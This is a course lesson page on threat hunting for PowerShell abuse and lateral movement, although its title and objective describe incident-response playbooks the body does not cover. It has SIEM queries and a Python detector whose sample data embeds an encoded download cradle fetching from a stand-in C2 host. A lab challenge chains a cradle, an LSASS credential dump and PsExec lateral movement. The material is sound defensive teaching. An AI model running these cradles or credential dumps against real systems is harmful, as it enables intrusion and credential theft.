Day 03 Incident Response

Incident Response Playbooks

NIST 800-61 lifecycle, containment decisions, chain of custody, and the playbook templates that turn a chaotic breach into a structured response with clear accountability.

~1 hour Intermediate Hands-on Precision AI Academy

Today's Objective

NIST 800-61 lifecycle, containment decisions, chain of custody, and the playbook templates that turn a chaotic breach into a structured response with clear accountability.

01

The Threat Hunting Loop

Hunting follows a loop:

  1. Create a hypothesis based on threat intelligence or ATT&CK techniques ('attacker is using PowerShell to download payloads').
  2. Investigate using SIEM queries, EDR data, or network logs.
  3. Uncover new patterns: either confirm the hypothesis (escalate) or find nothing (refine and loop).
  4. Inform and improve: create detection rules for anything found.

Over time, good hunts turn into automated detections.

02

Hunting PowerShell Abuse

PowerShell is the attacker's favorite living-off-the-land tool. Hunting indicators: encoded commands (the base64 -EncodedCommand parameter), download cradles (Net.WebClient, Invoke-Expression, IEX), AMSI bypass attempts, unusual parent processes (WINWORD.EXE spawning powershell.exe), and network connections from powershell.exe processes. Sysmon Event ID 1 (process creation) and Event ID 3 (network connection) are the primary data sources.

03

Hunting for Lateral Movement

Lateral movement leaves traces: unusual admin share access (Event ID 5140), remote service creation (Event ID 7045), WMI remote execution (Event ID 4648 with network logon), and Pass-the-Hash indicators (Event ID 4624 logon type 3 with NTLM authentication). Look for user accounts logging into machines they never normally access, especially outside business hours.

# Splunk: hunt for encoded PowerShell commands (Script Block Logging)
# index=windows EventCode=4104
# | regex Message="(?i)(-enc|-encodedcommand|IEX|Invoke-Expression)"
# | stats count by host, user, Message
# | sort -count

# Elasticsearch KQL: PowerShell network connections leaving the internal ranges
# process.name: "powershell.exe" AND network.direction: "outbound"
# AND NOT destination.ip: (10.0.0.0/8 OR 192.168.0.0/16)

# Zeek (shell): hunt for DNS-based C2 by looking for unusually long query names
zeek-cut query < dns.log | \
  awk 'length($0) > 50' | \
  sort | uniq -c | sort -rn | head -20

# Windows PowerShell: find lateral movement via admin shares
# (Event ID 5140 filtered to the IPC$, ADMIN$ and C$ shares; a trailing pipe
# continues the line in PowerShell, a backslash does not)
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=5140} |
  Where-Object { $_.Message -match 'IPC\$|ADMIN\$|C\$' } |
  Select-Object TimeCreated, Message | Format-List

# Sysmon (Splunk): find Word spawning PowerShell
# index=sysmon EventCode=1 ParentImage=*WINWORD.EXE* Image=*powershell.exe*
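The queries above run inside a SIEM. To make the same hunt logic concrete end to end, here is an added Python example (not part of the course material and not from any SIEM vendor) that applies the PowerShell-abuse indicators from section 02 and the lateral-movement indicators from section 03 to a handful of constructed events. The flattened field names (source, event_id, image, parent_image, command_line, share_name, logon_type, auth_package) and the per-host logon baseline EXPECTED_ACCESS are assumptions made for the example, and the sample events are constructed, not captured telemetry. The encoded-command check actually decodes the base64 UTF-16LE payload so that a cradle hidden behind -enc is still caught, which the plain regex in the Splunk search above does not do.

```python
import base64
import ipaddress
import re

# Constructed sample events (not real telemetry): a flattened view of Sysmon
# Event ID 1 / 3 and Security log Event IDs 5140 / 7045 / 4624 as a SIEM might
# export them. The field names are an assumption, not any product's schema.
ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1')"
    .encode("utf-16le")).decode()
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"source": "sysmon", "event_id": 1, "host": "WS01", "user": "CORP\\alice",
     "image": PS_IMAGE,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -NoP -W Hidden -enc " + ENCODED_CRADLE},
    {"source": "sysmon", "event_id": 1, "host": "WS02", "user": "CORP\\bob",
     "image": PS_IMAGE, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Users\\bob\\Documents"},
    {"source": "sysmon", "event_id": 3, "host": "WS01", "user": "CORP\\alice",
     "image": PS_IMAGE, "dest_ip": "203.0.113.7", "dest_port": 443},
    {"source": "security", "event_id": 5140, "host": "FS01", "user": "CORP\\alice",
     "share_name": r"\\*\ADMIN$", "src_ip": "10.1.2.3"},
    {"source": "security", "event_id": 7045, "host": "FS01", "user": "CORP\\alice",
     "service_name": "PSEXESVC"},
    {"source": "security", "event_id": 4624, "host": "FS01", "user": "CORP\\alice",
     "logon_type": 3, "auth_package": "NTLM", "src_ip": "10.1.2.3"},
    {"source": "security", "event_id": 4624, "host": "FS01", "user": "CORP\\svc-backup",
     "logon_type": 3, "auth_package": "Kerberos", "src_ip": "10.1.9.9"},
]

# Assumed baseline: which accounts normally log on to which hosts over the network.
EXPECTED_ACCESS = {"FS01": {"CORP\\svc-backup"}}
# Internal ranges, mirroring the exclusion in the KQL query above (plus 172.16/12).
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(
    r"Net\.WebClient|DownloadString|Invoke-Expression|\bIEX\b|Invoke-WebRequest", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ADMIN_SHARE_RE = re.compile(r"\\(IPC|ADMIN|[A-Z])\$$", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # -e/-enc was present but the argument is not a valid payload


def hunt_powershell(events):
    """Section 02 indicators over Sysmon Event ID 1 and 3 records."""
    findings = []
    for ev in events:
        if ev["source"] != "sysmon" or basename(ev.get("image", "")) != "powershell.exe":
            continue
        reasons = []
        if ev["event_id"] == 1:
            cmd = ev["command_line"]
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                reasons.append("encoded command")
            if CRADLE_RE.search(cmd) or (decoded and CRADLE_RE.search(decoded)):
                reasons.append("download cradle")
            if basename(ev.get("parent_image", "")) in OFFICE_PARENTS:
                reasons.append("office parent process")
        elif ev["event_id"] == 3:
            dest = ipaddress.ip_address(ev["dest_ip"])
            if not any(dest in net for net in INTERNAL_NETS):
                reasons.append("outbound connection to public IP")
        if reasons:
            findings.append({"host": ev["host"], "user": ev["user"], "reasons": reasons})
    return findings


def hunt_lateral_movement(events, expected=EXPECTED_ACCESS):
    """Section 03 indicators over Security log 5140 / 7045 / 4624 records."""
    findings = []
    for ev in events:
        if ev["source"] != "security":
            continue
        reasons = []
        eid = ev["event_id"]
        if eid == 5140 and ADMIN_SHARE_RE.search(ev["share_name"]):
            reasons.append("admin share access")
        elif eid == 7045:
            reasons.append("service installed: " + ev["service_name"])
        elif eid == 4624 and ev["logon_type"] == 3:
            if ev["auth_package"].upper() == "NTLM":
                reasons.append("NTLM network logon (pass-the-hash candidate)")
            if ev["user"] not in expected.get(ev["host"], set()):
                reasons.append("user outside host baseline")
        if reasons:
            findings.append({"host": ev["host"], "user": ev["user"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt_powershell(SAMPLE_EVENTS) + hunt_lateral_movement(SAMPLE_EVENTS):
        print(f"{f['host']:5} {f['user']:16} {', '.join(f['reasons'])}")
```

Each finding carries the list of indicators that fired, so the same output serves triage (a single hit on "office parent process" is worth a look, three hits on one process is an escalation) and the "inform and improve" step of the loop: any reason string that keeps firing on confirmed activity is a candidate for a standing detection rule.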
Tip: Document every hunt, even those that find nothing. A documented negative hunt means 'we looked for this and found no evidence.' This is valuable data for auditors and for repeating the hunt with better queries later.
πŸ“ Day 3 Exercise
Run a PowerShell Hunt
  1. Generate some PowerShell encoded command events on your Windows VM: powershell -EncodedCommand [base64]
  2. Search for these events in your SIEM using Event ID 4104 (Script Block Logging)
  3. Enable Sysmon on the Windows VM using the SwiftOnSecurity config
  4. Run a download cradle (Invoke-WebRequest) and search for the Sysmon network connection event
  5. Write a detection rule that alerts on any powershell.exe process making outbound connections

Day 3 Summary

Challenge

Simulate a complete attack chain on your lab: PowerShell download cradle → payload execution → LSASS credential dump → lateral movement via PsExec. Then hunt for all four techniques in your SIEM and write detection rules for each.

What's Next

The foundations from today carry directly into Day 4. In the next session the focus shifts to Threat Intelligence and MITRE ATT&CK, building directly on everything covered here.

Day 3 Checkpoint

Before moving on, verify you can answer these without looking:

  • What is the core concept introduced in this lesson, and why does it matter?
  • What are the two or three most common mistakes practitioners make with this topic?
  • Can you explain the key code pattern from this lesson to a colleague in plain language?
  • What would break first if you skipped the safeguards or best practices described here?
  • How does today's topic connect to what comes in Day 4?

Live Bootcamp

Learn this in person: 2 days, 5 cities

Thu–Fri sessions in Denver, Los Angeles, New York, Chicago, and Dallas. $1,490 per seat. June–October 2026.
